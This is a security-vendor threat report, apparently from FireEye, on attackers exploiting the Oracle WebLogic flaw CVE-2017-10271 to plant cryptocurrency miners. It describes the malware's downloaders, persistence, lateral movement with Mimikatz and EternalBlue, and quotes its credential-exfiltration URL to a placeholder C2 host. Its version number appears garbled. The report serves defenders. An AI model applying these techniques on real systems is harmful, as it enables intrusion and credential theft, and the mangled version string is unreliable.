CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.
CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 126.96.36.199.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.
FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.
We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.
The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.
Tactic #1: Delivering the miner directly to a vulnerable server
Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().
Figure 1: Downloading the payload directly
Tactic #2: Utilizing PowerShell scripts to deliver the miner
Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).
Figure 2: Exploit delivering PowerShell script
This script has the following functionalities:
- Downloading miners from remote servers
Figure 3: Downloading cryptominers
As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.
- Creating scheduled tasks for persistence
Figure 4: Creation of scheduled task
- Deleting scheduled tasks of other known cryptominers
Figure 5: Deletion of scheduled tasks related to other miners
In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.
From this, it’s quite clear that different attackers are fighting over the resources available in the system.
- Killing processes matching certain strings associated with other cryptominers
Figure 6: Terminating processes directly
Figure 7: Terminating processes matching certain strings
Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).
- Connects to mining pools with wallet key
Figure 8: Connection to mining pools
The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.
- Limiting CPU usage to avoid suspicion
Figure 9: Limiting CPU Usage
To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue
The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).
The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.
Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.
If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.
After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.
Tactic #4: Scenarios observed in Linux OS
We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.
Figure 10: Delivery of shell scripts
The shell script performs the following activities:
- Attempts to kill already running cryptominers
Figure 11: Terminating processes matching certain strings
- Downloads and executes cryptominer malware
Figure 12: Downloading CryptoMiner
- Creates a cron job to maintain persistence
Figure 13: Cron job for persistence
- Tries to kill other potential miners to hog the CPU usage
Figure 14: Terminating other potential miners
The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.
Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.
Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.
FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.
At the time of writing, FireEye HX detects this activity with the following indicators:
POWERSHELL DOWNLOADER (METHODOLOGY)
MONERO MINER (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)
Indicators of Compromise
Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.